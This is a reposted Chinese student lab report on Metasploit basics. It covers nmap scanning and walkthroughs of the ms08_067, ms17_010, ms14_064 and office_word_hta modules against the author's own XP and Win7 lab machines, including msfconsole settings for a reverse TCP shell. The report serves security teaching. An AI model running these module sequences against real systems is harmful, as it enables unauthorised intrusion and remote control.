MSF基礎應用


模塊說明

exploit

這個是攻擊模塊,專門利用漏洞來打通連接的。之前的實驗已經做出了后門,但是都需要我們手動傳輸到靶機並打開才行,這樣的話就需要社會工程學攻擊來輔助才能成功,因為別人的電腦不可能那么配合我們的。這時候就需要exploit模塊來幫我們了,exploit模塊可以利用漏洞幫我們把payload送到靶機。

payload

是有效載荷,后面一般加要對靶機進行攻擊的代碼,包含了各種各樣調戲靶機的手段,可以完成對靶機的各種操作,來完成我們的攻擊目的。

encode

編碼器,對代碼進行異或運算、去除壞字符等等,保護payload不被發現。payload明目張膽的過去肯定是要被殺的,而encode給payload整個容殺軟啥的就認不出payload了,於是payload才能安心干壞事。

環境

主機:kali

靶機:windows xp SP3 english、windows 7 sp1 english

namp掃描

先給出namp常用的功能:

進行ping掃描,打印出對掃描做出響應的主機,不做進一步測試(如端口掃面或者操作系統探測):
nmap -sP 192.168.1.0/24
探測目標主機開放的端口,可以指定一個以逗號分隔的端口列表(如-PS22,23,25,80):
nmap -PS 192.168.1.234
使用頻率最高的掃描選項:SYN掃描,又稱為半開放掃描,它不打開一個完全的TCP連接,執行得很快:
nmap -sS 192.168.1.0/24
確定目標機支持哪些IP協議 (TCP,ICMP,IGMP等):
nmap -sO 192.168.1.19
探測目標主機的操作系統:
nmap -O 192.168.1.19
nmap -A 192.168.1.19
進行秘密SYN掃描,對象為主機Saznme所在的“C類”網段的255台主機。同時嘗試確定每台工作主機的操作系統類型。因為進行SYN掃描 和操作系統檢測,這個掃描需要有根權限。
nmap -sV -p 22,53,110,143,4564 198.116.0-255.1-127
 
因為不知道同網段哪些地址是有用的,所以先對同網段進行syn掃描,之后在對具體ip進行端口掃描,可以節省時間。
 

 

其實這邊知道xp的ip是192.168.201.129,接着用nmap -PS 192.168.201.128來進行端口掃描,因為下面要用到ms08_067攻擊模塊進行攻擊,所以要確保445端口是打開的,也就是可以ping通。結果發現xp防火牆打開的時候445是默認關閉的,於是把防火牆關掉再掃描可以看見445端口已經打開。這樣第一步准備工作就差不多了。

 

利用ms08_067進行滲透

在msfconsole下search先找到這個模塊並且use該模塊

首先應當show targets查看該exploit模塊可攻擊的對象,否則可能白費功夫,我們的xp是sp3 english,可以被該模塊攻擊。

 

接下先設置payload,show payloads可以列出該攻擊模塊支持的payload。這里選了shell_reverse_tcp作為payload。

之后設置一些必要的options,如果不知道設置哪些東西可以先show options查看一下。對這個模塊和payload只需要設置設置回連ip和監聽ip就可以使用了。

set RHOST 192.168.201.129  #設置回連ip,即靶機ip
set LHOST 192.168.201.128  #設置監聽ip

然后exploit,大功告成

 

 利用永恆之藍ms17_010模塊攻擊win7 

先掛上攻擊成功的截圖

大概的攻擊流程如下

set payload xxx     #設置payload
set RHOST xxx      #設置目標ip
set LHOST xxx      #設置監聽ip
set smbuser xxx    #設置用戶名,靶機上的用戶
set smbpass xxx    #設置登錄密碼
exploit

這里用的是ms17_010_psexec模塊,ms17_01還有ms17_010_eternalblue版本,當時是因為看到ms17_010_psexec模塊比較新所以用它。但是這個模塊還需要輸入用戶名密碼來實現攻擊,顯得不是很好用。然后查了百度說是有些ms17_010_eternalblue模塊可以不用輸入用戶名和密碼來攻擊,然后自己親測了以下,從下圖看出應該是沒法攻擊我這個系統,輸了賬號密碼也不行,看來新版本還是靠譜一點。

用了這個漏洞感覺沒想象的那么強大,還要輸用戶名密碼,從另一個角度看來,平時用電腦啥的多設置一個密碼真是好習慣。這個模塊提供了一個類似字典暴力破的東西,可以通過管道輸入一堆用戶名用於測試來打通連接。所以類似“Administrator+空密碼”這類用戶就得遭殃了。

能想到用這個漏洞是因為在用openvas掃描后發現提示smb漏洞攻擊成功率很高,所以去msfconsole里面search了一下就找到了。本來這個漏洞是希望拿來攻擊win10的,不過不行,target提示錯誤了。於是又拿去win7試了一下打通了。

 

openvas的安裝和使用老師的文檔里講的很清楚,這里不作贅述。

如果要更好的利用這個漏洞,可以利用smb_ms17_010輔助模塊來掃描可以攻擊的ip,這個輔助模塊在一定程度上彌補了需要用戶名密碼的缺陷。

use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.201.0/24         #掃描192.168.201.0-192.168.201.255的ip
run

 

 

利用ms14_064針對瀏覽器攻擊

這個模塊是通過search browser隨便找出的一個,之前試了好幾個都不好用。還在exploit-db上下載了一個比較新的,因為是適用火狐44.0.2的,還特意下了,結果搞了半天出不了結果。

這些模塊用起來都差不多:

set SRVHOST xxx    #自己的ip
set payload xxx       #選一個合適的payload
set LHOST xxx         #自己的ip
exploit

和前面的主動攻擊不同的是需要在靶機上訪問生成的url,如上圖所示,這個url可以自己設置。然后在xp系統中打開ie,輸入url訪問,在kali的msfconsole下就可以看到結果了,如下圖。

 

這個漏洞targets里面說可以攻擊xp和win 7,不過親測只有xp能通。

 利用office_word_hta模塊攻擊win7

在windows/fileformat下面翻了好久找到這么一個好用的模塊,也是為了滿足試驗要求。

看這個模塊的options可以發現參數都有默認配置,其實直接就可以用,要改也只需要改一下SRVHOST就可以。

然后在win7上訪問下圖中的url測試,滲透成功。

show options就可以知道應該配置哪些選項

exploit-db上導入模塊

首先在exploit-db上找到自己需要的模塊並下載,一般只有標有meterpreter下下來才是可以導入的.rb文件。找到meterpreter的module的路徑,只需要把.rb文件放到module里面然后msfconsole重新導入就可以了,不過最好可以新建一個文件夾專門放自己的module。

拷貝進去之后打開msfconsle,

msf>   reload_all

結束后可以use測試一下。

 

 實驗體會

這次實驗剛開始有點不知從何下手,聽老師說的去exploit-db上找個攻擊win10的模塊,不裝xp。結果忙活了大半天試了幾個啥反應都沒有,最后還是放棄win10轉戰win7和xp。

我先是下了一個Exodus Wallet (ElectronJS Framework) - Remote Code Execution (Metasploit),操作感覺都ok,可是到最后win10瀏覽器打開鏈接出現幾個提示就沒反應了。后面又試了一個針對firefox瀏覽器44.0.2版本的攻擊,按它說明是windows平台點開鏈接瀏覽器會崩並打開calc.exe,然而我自己試確實瀏覽器崩了啥反應沒有。。。

然后我就裝了xp照着實驗指導用ms08_067模塊試了一下,沒幾下就搞定了。對比之前最大的感受就是這些meterpreter裝好的模塊的說明很詳細,基本上隨便一個模塊show targets + show options +show payloads就可以直接用了,不行再打開.rb文件里面看注釋也挺詳細的。可是exploit-db上的幫助和targets啥的根本看不出什么東西,出錯了報錯也不完善,估計是別人剛開發就傳上去了,對新手太不友好了。

xp成功后我又開始對win10有想法了,然后利用端口掃描看打開的端口。針對這幾個端口我又測試了幾個模塊,依然gg,可是又覺得xp現在的使用率已經很低了,於是裝了個win7開搞。

然后用之前對win10用過的模塊在win7上面試了一下,結果就成功了,看來還是要跟着時代走,該更新還是要更新。

我覺得這次實驗其實難點根本就不再攻擊模塊的使用,能否用好輔助模塊反而更關鍵。如果把輔助模塊用好了,就能少走很多彎路,避免很多不必要的工作。還有漏洞掃描工具openvas我是做了一半才去使用它的,現在看來第一步就應該拿這個掃一遍,應該拿什么模塊攻擊search一下全出來了。

做了這次實驗感覺要實現局域網內的攻擊是比較容易的,聽了老師對網絡通信的一個介紹后,感覺要黑外網的電腦太難了,除非能把各個網關都黑掉,基本只能釣魚等着用戶自己去點。反過來看只要我們不點不良鏈接,提高網絡安全意識,要被黑客給黑到真的是很難的。同時應該注意到局域網的安全性不是那么有保障,應該少連一些路邊wifi,免得啥時候被黑了都不知道,還有就是操作系統的更新、漏洞的修復真的有用啊,我要是不更新win10,能是下面這個結果嗎(192.168.201.1就是我的win10),win7都不用下了。

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM